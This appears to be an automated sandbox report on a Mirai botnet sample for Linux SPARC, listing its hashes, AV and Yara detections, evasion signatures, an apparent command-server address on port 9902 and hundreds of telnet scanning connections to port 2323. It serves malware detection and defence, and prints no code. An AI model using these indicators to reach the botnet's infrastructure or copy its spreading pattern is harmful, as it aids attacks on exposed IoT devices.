Linux Analysis Report
WU3D24p3h0.elf

Overview

General Information

Sample Name: WU3D24p3h0.elf
Original Sample Name: aa7bec0933c6e3ae75ba8ebcd80298af.elf
Analysis ID: 1345568
MD5: aa7bec0933c6e3ae75ba8ebcd80298af
SHA1: 5508852870443a95501ec1ccb4f48171dc9cee79
SHA256: ec1dd8fe9c2ea023c05097458899dbab73ab5ce4f5b1779f1a67ee2a8a9b1df2
Tags: 32elfmiraisparc
Infos:

Detection

Mirai
Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Uses known network protocols on non-standard ports
Yara signature match
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: WU3D24p3h0.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: WU3D24p3h0.elf ReversingLabs: Detection: 50%
Source: WU3D24p3h0.elf Virustotal: Detection: 58% Perma Link

Networking
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46938
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46944
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46946
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46956
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46958
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46968
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46970
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46974
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46978
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46986
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46988
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46998
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47004
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47016
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47026
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:44628 -> 45.88.90.129:9902
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 193.15.128.139:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 41.61.211.253:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 84.177.69.232:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 41.3.250.83:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 12.17.84.238:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 94.64.224.44:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 161.249.64.205:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 8.239.112.190:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 217.19.193.142:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 42.166.221.214:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 177.144.104.98:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 113.60.67.26:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 72.140.254.94:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 61.131.123.208:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 176.51.210.133:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 84.252.25.16:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 161.195.96.1:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 58.213.76.135:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 180.79.220.190:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 108.192.69.119:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 117.55.11.93:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 202.23.235.192:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 69.71.200.140:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 43.3.155.110:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 94.76.49.36:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 139.48.233.221:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 18.242.233.47:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 17.193.65.203:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 76.37.54.89:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 109.243.92.155:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 126.142.203.197:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 38.144.149.20:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 212.168.250.182:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 96.112.162.195:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 77.44.38.74:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 86.107.7.179:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 9.35.13.84:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 161.228.124.9:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 81.83.233.146:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 125.2.78.63:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 76.140.123.43:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 75.177.213.174:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 207.55.49.1:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 154.195.123.180:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 76.143.156.194:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 145.67.91.227:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 168.116.0.57:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 76.213.42.57:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 200.138.87.91:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 196.15.116.93:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 179.54.50.147:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 168.33.82.219:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 36.91.81.192:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 59.245.247.147:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 27.85.157.149:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 196.122.97.247:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 79.105.203.95:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 162.204.32.170:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 198.143.216.169:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 145.153.241.40:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 83.26.140.11:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 169.46.170.6:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 206.23.88.105:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 81.71.37.41:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 92.31.195.225:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 40.103.172.201:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 103.230.191.177:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 169.40.168.1:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 212.173.117.138:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 160.9.86.132:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 63.94.109.194:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 80.14.8.120:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 177.197.16.8:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 2.155.119.15:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 212.9.94.105:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 78.122.13.101:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 113.110.133.18:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 159.67.183.158:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 206.115.62.142:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 19.135.172.71:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 9.216.21.177:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 53.178.178.169:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 19.217.215.20:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 200.131.16.246:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 171.182.143.55:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 112.7.85.7:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 141.141.132.109:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 2.206.75.155:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 102.9.244.192:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 191.173.91.99:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 169.18.51.203:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 37.102.160.119:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 149.217.148.231:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 4.100.144.138:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 103.97.155.157:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 43.60.188.248:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 123.181.89.173:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 176.203.124.201:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 197.61.1.112:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 165.19.55.131:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 41.182.183.187:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 173.15.78.149:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 165.221.180.11:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 202.77.32.236:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 145.169.98.227:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 84.139.165.121:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 64.237.173.95:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 108.148.156.181:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 37.90.211.137:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 147.111.157.241:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 37.119.18.28:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 144.110.58.226:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 133.174.99.73:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 13.88.116.44:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 83.0.183.86:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 205.234.248.133:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 45.74.83.125:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 71.57.255.66:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 147.83.62.27:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 207.79.26.29:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 152.68.38.183:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 12.197.248.66:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 151.168.186.233:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 202.220.31.206:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 171.119.20.181:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 102.58.134.252:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 93.35.229.164:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 168.192.181.162:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 175.140.42.138:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 201.31.70.142:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 34.40.192.210:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 151.227.10.214:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 130.48.209.60:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 139.52.144.216:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 203.52.73.143:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 163.55.19.222:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 135.13.179.102:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 163.19.148.84:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 92.197.64.0:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 139.34.84.116:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 211.53.92.2:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 118.135.181.34:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 97.68.51.77:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 145.56.95.106:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 44.177.45.170:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 32.21.221.164:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 171.248.192.250:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 144.113.20.240:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 222.56.27.0:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 120.118.38.92:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 86.126.28.163:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 212.219.196.211:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 125.253.234.235:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 201.70.118.84:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 187.92.53.29:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 88.44.222.104:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 108.19.122.227:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 220.85.3.50:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 99.50.118.183:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 92.71.211.80:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 85.209.41.212:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 121.68.209.100:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 122.64.39.199:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 162.232.212.163:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 148.59.250.152:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 132.184.71.180:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 171.247.141.226:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 113.28.184.93:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 13.72.43.239:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 139.172.12.230:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 155.67.51.230:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 57.212.115.23:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 164.248.221.7:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 109.191.24.108:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 208.192.242.70:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 140.164.168.175:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 126.189.203.231:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 73.155.31.117:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 35.18.174.237:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 99.75.9.197:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 206.9.245.95:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 19.229.25.166:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 20.210.208.198:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 150.253.74.221:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 145.145.146.39:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 139.30.54.39:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 163.62.46.251:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 125.176.136.216:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 5.84.207.218:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 94.50.24.158:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 209.178.21.175:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 209.55.53.246:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 153.144.44.9:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 198.20.31.105:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 101.172.235.111:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 140.72.20.231:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 124.208.240.174:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 145.193.39.16:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 184.181.39.36:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 174.116.112.0:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 182.224.98.211:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 12.123.83.62:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 156.205.209.51:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 154.140.96.62:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 96.194.249.36:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 222.122.33.30:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 189.20.105.28:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 39.68.95.223:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 76.108.200.139:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 47.126.36.238:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 78.160.208.235:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 38.56.181.86:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 132.156.147.6:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 122.108.66.246:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 73.204.104.138:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 136.41.35.80:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 114.64.161.27:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 117.182.7.15:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 76.167.183.104:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 113.154.198.177:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 174.199.64.203:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 73.178.101.202:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 59.39.32.163:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 8.97.45.36:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 167.180.88.191:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 119.205.30.5:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 87.234.124.33:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 148.94.169.135:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 195.37.34.226:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 205.128.230.186:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 206.177.16.128:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 176.93.1.140:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 98.98.250.228:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 82.82.149.237:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 162.27.198.13:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 5.227.38.16:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 197.28.201.66:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 99.69.33.211:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 166.41.149.131:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 18.94.186.51:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 48.18.102.64:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 209.204.31.248:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 107.223.105.67:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 136.205.153.128:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 196.208.69.18:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 114.108.116.87:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 188.146.127.155:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 104.184.100.115:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 216.99.172.135:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 69.65.107.179:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 119.177.45.111:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 31.18.194.220:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 44.226.229.220:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 129.222.8.62:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 12.126.25.204:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 219.23.201.96:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 190.205.41.83:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 47.52.230.27:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 99.88.49.48:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 179.3.183.163:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 144.58.251.65:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 99.92.5.130:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 101.250.95.160:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 218.210.195.220:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 118.72.14.95:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 38.157.17.190:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 161.180.30.72:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 116.249.104.254:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 31.253.44.8:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 34.185.32.118:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 58.204.150.185:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 171.154.208.180:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 126.37.64.62:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 24.251.173.129:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 217.236.77.106:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 104.159.243.132:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 186.140.147.10:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 190.56.40.138:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 107.138.53.211:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 37.50.96.82:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 37.213.178.93:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 80.118.130.242:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 174.10.123.239:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 171.229.130.19:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 61.143.94.86:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 139.0.205.140:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 207.207.65.48:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 128.23.228.162:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 113.101.30.193:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 16.160.5.204:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 208.88.86.42:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 73.5.161.236:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 198.32.22.62:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 191.123.173.149:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 87.232.151.55:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 36.190.171.240:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 46.80.203.59:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 91.195.253.175:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 124.38.96.153:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 57.45.2.14:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 23.123.202.228:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 117.34.111.186:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 91.12.20.104:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 148.2.70.93:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 207.89.29.1:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 107.121.128.68:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 93.120.44.54:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 19.174.140.231:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 121.116.138.198:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 88.131.9.111:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 133.84.13.57:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 217.110.31.239:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 14.13.80.26:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 136.183.81.55:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 82.152.133.64:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 80.159.44.134:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 205.123.91.75:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 101.105.40.140:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 195.108.62.74:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 47.178.126.51:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 191.171.102.85:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 97.172.219.240:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 57.173.175.228:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 152.95.207.246:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 110.227.105.226:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 63.192.8.105:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 138.17.156.230:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 5.210.208.28:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 107.151.198.190:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 90.207.237.114:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 169.35.189.68:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 151.71.218.242:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 141.247.37.193:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 77.11.81.213:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 117.142.213.125:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 134.172.135.250:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 24.35.157.93:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 54.124.135.185:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 118.10.159.65:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 158.57.62.249:2323
